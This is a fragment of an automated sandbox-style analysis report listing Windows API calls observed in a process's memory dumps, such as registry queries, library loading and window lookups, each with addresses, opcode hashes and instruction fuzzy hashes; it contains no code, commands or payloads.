
                                  Uniqueness Score: -1.00%

                                  APIs
                                  • TerminateThread.KERNEL32(-00000001A98E2473,52793E8C), ref: 0056BF19
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9672248989.000000000056B000.00000040.00000001.sdmp, Offset: 0056B000, based on PE: false
                                  Similarity
                                  • API ID: TerminateThread
                                  • String ID:
                                  • API String ID: 1852365436-0
                                  • Opcode ID: 36f46ed9bb856f029bdf47e2dd1927149be629589cd4fd2ae09e6c8f1518c834
                                  • Instruction ID: 2900082a18ad376bd414bc8137b9d8b13d64554b3b896c115687f67a9a5ac0cb
                                  • Opcode Fuzzy Hash: 36f46ed9bb856f029bdf47e2dd1927149be629589cd4fd2ae09e6c8f1518c834
                                  • Instruction Fuzzy Hash: AF3148726043849FEB258F38CCC87EA77A6BF95710F698196D909CB261D33589C5CB11
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00AEDD61
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9675193275.0000000000AE0000.00000040.00000010.sdmp, Offset: 00AE0000, based on PE: false
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 412c60c21b5339d8a343526bca96093376cd033cb79146b2cd6297ef28a9de95
                                  • Instruction ID: 96f797881f61f3e465f60b821e04f3e50465d3f87d2f1303bfd1bebe44c94bfd
                                  • Opcode Fuzzy Hash: 412c60c21b5339d8a343526bca96093376cd033cb79146b2cd6297ef28a9de95
                                  • Instruction Fuzzy Hash: A931D2B1D012589FCB20CFAAC884ADEFBF5BF48714F15842AE819AB314D7749904CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 00AEDAA4
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9675193275.0000000000AE0000.00000040.00000010.sdmp, Offset: 00AE0000, based on PE: false
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 64118e17b43c8fbea75dfbf86c515dd22d0c6456468f41ee11c2c6197a8df599
                                  • Instruction ID: 71d6adc60b2d6bcee9da6be41ae85cf59a0edfa0c89d55a2fc655a510fe61b2e
                                  • Opcode Fuzzy Hash: 64118e17b43c8fbea75dfbf86c515dd22d0c6456468f41ee11c2c6197a8df599
                                  • Instruction Fuzzy Hash: 183102B1D052899FDB10CFA9C584A8EFFF5BF48304F25816AE809AB341C7759945CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D42A5D7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9684145057.000000001D420000.00000040.00000001.sdmp, Offset: 1D420000, based on PE: false
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 58d35175c5c550c0398104228f10d8dbe900babf373da1614a0640bd6256f49a
                                  • Instruction ID: 6e9328bfb21a1f2c48311fcf0b1efb1296c2e756334fd7bff0f5fe9dc3942410
                                  • Opcode Fuzzy Hash: 58d35175c5c550c0398104228f10d8dbe900babf373da1614a0640bd6256f49a
                                  • Instruction Fuzzy Hash: B02114B5D002089FDB00CFA9D885ADEFBF4FB48320F10801AE915A3310D378A940CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D42A5D7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9684145057.000000001D420000.00000040.00000001.sdmp, Offset: 1D420000, based on PE: false
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 9d8a998dd0ee884545b2075ece225d4a5481140054436229a4ebb4a90a9ee58d
                                  • Instruction ID: 987dd3302bf12cddb488f1cbeb5c7e268da31d548cec96558fd67d3ac8a752a4
                                  • Opcode Fuzzy Hash: 9d8a998dd0ee884545b2075ece225d4a5481140054436229a4ebb4a90a9ee58d
                                  • Instruction Fuzzy Hash: 1B21C2B59002499FDB10CFAAD985ADEFBF4FB48320F14841AE955A3310D778A954CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindWindowW.USER32(00000000,00000000), ref: 00AFF6F6
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9675328331.0000000000AF0000.00000040.00000010.sdmp, Offset: 00AF0000, based on PE: false
                                  Similarity
                                  • API ID: FindWindow
                                  • String ID:
                                  • API String ID: 134000473-0
                                  • Opcode ID: 663d5d942ea798b00f894fca242f12610c049b433909c50bb3c88a5b703ebc91
                                  • Instruction ID: 9c8aaaf48fc00ed80f1a648491d6fd60ac886481e254dd58bad7ad38c069d620
                                  • Opcode Fuzzy Hash: 663d5d942ea798b00f894fca242f12610c049b433909c50bb3c88a5b703ebc91
                                  • Instruction Fuzzy Hash: C02122B59016498FCB10CF9AC884AEEFBB4FF49320F10852EE959B7610D774A904CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00AF9E8F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9675328331.0000000000AF0000.00000040.00000010.sdmp, Offset: 00AF0000, based on PE: false
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID:
                                  • API String ID: 1890195054-0
                                  • Opcode ID: 30781c965de673556ccbcab5423d49d5b81e86d41e08f32826c7e69704c277a3
                                  • Instruction ID: 194e1f4f946af1cb89b90392fb74e2c38207570f205c5aa6dc3a0e2b749e1d63
                                  • Opcode Fuzzy Hash: 30781c965de673556ccbcab5423d49d5b81e86d41e08f32826c7e69704c277a3
                                  • Instruction Fuzzy Hash: 271133B1C046599FCB10CFAAC445BEEFBB0EF48324F15856AE918A7640D778A905CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindWindowW.USER32(00000000,00000000), ref: 00AFF6F6
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9675328331.0000000000AF0000.00000040.00000010.sdmp, Offset: 00AF0000, based on PE: false
                                  Similarity
                                  • API ID: FindWindow
                                  • String ID:
                                  • API String ID: 134000473-0
                                  • Opcode ID: 55177048c03ba9010c31c73dbbb0190e9f856990342c0091f9e1253c97ec6a2c
                                  • Instruction ID: f53004a491185d28643bb8feaf3c579dc826b9f1f87ac8b8ac7fbf86a1ff75c7
                                  • Opcode Fuzzy Hash: 55177048c03ba9010c31c73dbbb0190e9f856990342c0091f9e1253c97ec6a2c
                                  • Instruction Fuzzy Hash: 6E21E0B59016498FCB10CFAAD884AEEFBB0FF49314F14852ED959B7610C7746544CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,00112A89,00000800), ref: 00112B1A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671837436.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 2493a0d0a6ce5b47310584945775bdba4044f249a48dbd7a5cf58b2a4366b081
                                  • Instruction ID: df958577c2202918a4b50b68ba66792efa1158a9d52d6b07d6e84d2e0fddb0e1
                                  • Opcode Fuzzy Hash: 2493a0d0a6ce5b47310584945775bdba4044f249a48dbd7a5cf58b2a4366b081
                                  • Instruction Fuzzy Hash: 5B1103B29042498FCB14DFAAD444ADEFBF4EF48320F14842AE915A7600C778A944CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,00112A89,00000800), ref: 00112B1A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671837436.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: c3009df20424816dd1a17969e087f39898ec6b2cb6f06e6de89fccb1fb8041ce
                                  • Instruction ID: acf3febff19e5c28406f64132dbf386f64723370857292bbe907cea59a420ad1
                                  • Opcode Fuzzy Hash: c3009df20424816dd1a17969e087f39898ec6b2cb6f06e6de89fccb1fb8041ce
                                  • Instruction Fuzzy Hash: 4B1100B69042498FDB14CFAAD484ADEFBF4FF88324F14842ED919A7600C378A545CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,00112A89,00000800), ref: 00112B1A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671837436.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 9d4006e7c8ebd107f6f18e4541b97ce01b860706f7ac02b894d66ddc4d7b3d24
                                  • Instruction ID: 6c94e5e384b1f72793162466cb1e79495d64d6c4d4406d3d073a1a9b1fe153a9
                                  • Opcode Fuzzy Hash: 9d4006e7c8ebd107f6f18e4541b97ce01b860706f7ac02b894d66ddc4d7b3d24
                                  • Instruction Fuzzy Hash: A21122B29083448FCB18CFA8E8047DEFBF4EF49324F14446ED504A7642C3B8A985CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000), ref: 1D4257B6
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9684145057.000000001D420000.00000040.00000001.sdmp, Offset: 1D420000, based on PE: false
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: bd104c427433f2a3ef69918e558ec943cffaeea87979531ede5a41e8e19e6e32
                                  • Instruction ID: 46cf30bb49fa8a3d627c7549a4a61890bc5bd5392893e4c09ec99bbffc8a3374
                                  • Opcode Fuzzy Hash: bd104c427433f2a3ef69918e558ec943cffaeea87979531ede5a41e8e19e6e32
                                  • Instruction Fuzzy Hash: 2F11F3B5D046498FCB10DF9AD444B9EFBF4EF89220F50842AD85AB7700D378A545CFA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000), ref: 1D4257B6
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9684145057.000000001D420000.00000040.00000001.sdmp, Offset: 1D420000, based on PE: false
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 8172848c01232accf3520c2e0f75125975b03c06550a9bd1fa6da5d9aaf5d737
                                  • Instruction ID: 1c6f6e9292b4010c3ac1d11a569cd49c898ce654d177fcad4f20fcabaf3edf19
                                  • Opcode Fuzzy Hash: 8172848c01232accf3520c2e0f75125975b03c06550a9bd1fa6da5d9aaf5d737
                                  • Instruction Fuzzy Hash: 6811F0B5D046498FCB10CFAAD444ADEFBF8EF89320F10841AD85AA7610C379A545CFA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • OleInitialize.OLE32(00000000), ref: 00116945
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671837436.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                  Similarity
                                  • API ID: Initialize
                                  • String ID:
                                  • API String ID: 2538663250-0
                                  • Opcode ID: 13607f1d9b351b2ee2e48a074bd6bd58a8b8ea3870977ffa19713f0e525118aa
                                  • Instruction ID: aef091ec07a2aa94ecd7dedbda15f5ed4bfced28e5d23d2da2c415c49b49eb63
                                  • Opcode Fuzzy Hash: 13607f1d9b351b2ee2e48a074bd6bd58a8b8ea3870977ffa19713f0e525118aa
                                  • Instruction Fuzzy Hash: 651103B19046498FCB10DFAAD449BDEFFF4FB49324F20845AD558A7600C379A544CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • OleInitialize.OLE32(00000000), ref: 00116945
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9671837436.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                  Similarity
                                  • API ID: Initialize
                                  • String ID:
                                  • API String ID: 2538663250-0
                                  • Opcode ID: e8aabfda30901450b281915e816eccd73e272e72946906f22c27fabe4b7556e5
                                  • Instruction ID: 6f936d2d1eb222bbbf3b969605e094ddbfed1c704d8b8bf5ec08483d02582b76
                                  • Opcode Fuzzy Hash: e8aabfda30901450b281915e816eccd73e272e72946906f22c27fabe4b7556e5
                                  • Instruction Fuzzy Hash: 541145B09047498FCB10DFA9C449BDEFBF4EB48324F20846AE958A7300C779A944CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000), ref: 1D4257B6
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9684145057.000000001D420000.00000040.00000001.sdmp, Offset: 1D420000, based on PE: false
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 65789e07b66dc0261838f87602edc2dd2d52a9b09f555bc63fd69f9752566601
                                  • Instruction ID: 788a9db35aae196a64c124bb0a5f4021efa9f9f63091e7739912839b9908bd27
                                  • Opcode Fuzzy Hash: 65789e07b66dc0261838f87602edc2dd2d52a9b09f555bc63fd69f9752566601
                                  • Instruction Fuzzy Hash: 971118B59087098EDB04CF5AD4447DEFBF4AF88324F6485AEC059AB212C336A146CF95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9683606257.000000001D3ED000.00000040.00000001.sdmp, Offset: 1D3ED000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3a7064c99664e8a1255a3f926261271485944b67a48c5f3587035a621cda2e17
                                  • Instruction ID: 1456b7680abbc7b3924eae6f6a0ad8885c3e3c3694316113c7a2bc4688b59e24
                                  • Opcode Fuzzy Hash: 3a7064c99664e8a1255a3f926261271485944b67a48c5f3587035a621cda2e17
                                  • Instruction Fuzzy Hash: 5C210371504244DFDB01DF1CE9C8B1ABBA5FB98364F20C679E9090B296C736E446CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9683606257.000000001D3ED000.00000040.00000001.sdmp, Offset: 1D3ED000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d3ebc5ec0bb007f659c3903790199758f3b45294845248a9067cebe71179f9b5
                                  • Instruction ID: da7396c2286bec1654bd35a008250d4eb1ce142f8e50a61f65a7df57d5bff11e
                                  • Opcode Fuzzy Hash: d3ebc5ec0bb007f659c3903790199758f3b45294845248a9067cebe71179f9b5
                                  • Instruction Fuzzy Hash: 2D210671504240DFDB01DF2CE9C4B26BF65FB84768F20C669E9090B296C376D446CBE2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9683722664.000000001D3FD000.00000040.00000001.sdmp, Offset: 1D3FD000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e577ed165441a2dd2900eac7580b3679e54d93dce19c5cbe25f9fa4cf11130b6
                                  • Instruction ID: f4f0606ef694730aca08d5c57b482cccb8124a2881d75cfe800c0c9797332252
                                  • Opcode Fuzzy Hash: e577ed165441a2dd2900eac7580b3679e54d93dce19c5cbe25f9fa4cf11130b6
                                  • Instruction Fuzzy Hash: 5721F570604245DFDB05DF28E98CB16BB65FB84718F20C669E9094B246C73AD447CAA3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9683722664.000000001D3FD000.00000040.00000001.sdmp, Offset: 1D3FD000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e984f74df79b0be7432f789205071046e28d8deba052b041dc03c5987a6426bc
                                  • Instruction ID: d99a96b531be7b092af89dd6c24213062180e245ebc4d71b9e08d6143dafe648
                                  • Opcode Fuzzy Hash: e984f74df79b0be7432f789205071046e28d8deba052b041dc03c5987a6426bc
                                  • Instruction Fuzzy Hash: F62184755083849FC702CF24E998B15BF71EB46314F24C6EAD8498B257C33AD856CB63
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9683606257.000000001D3ED000.00000040.00000001.sdmp, Offset: 1D3ED000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7cf8b01436eb909c94b5bb7854a7f24a9c27e01e503fb3c96aaf5ccca9f8e0e0
                                  • Instruction ID: 850b90df99b63f9513ce4f3d4fb142d9e4e2c9df45f98657b5f90bf3e77b8ec8
                                  • Opcode Fuzzy Hash: 7cf8b01436eb909c94b5bb7854a7f24a9c27e01e503fb3c96aaf5ccca9f8e0e0
                                  • Instruction Fuzzy Hash: 0611D376504280CFCB01CF18E9C5B1ABF71FB84328F24C6A9D8490B696C336D456CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.9683606257.000000001D3ED000.00000040.00000001.sdmp, Offset: 1D3ED000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7cf8b01436eb909c94b5bb7854a7f24a9c27e01e503fb3c96aaf5ccca9f8e0e0
                                  • Instruction ID: 618089021ae40b08d67b67fdf15bb94dd22863e9b795f43bbe958473781f4e43
                                  • Opcode Fuzzy Hash: 7cf8b01436eb909c94b5bb7854a7f24a9c27e01e503fb3c96aaf5ccca9f8e0e0
                                  • Instruction Fuzzy Hash: F311B176504280DFCB01CF18E5C5B1ABF71FB94324F24C6A9D8090B656C33AE456CFA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions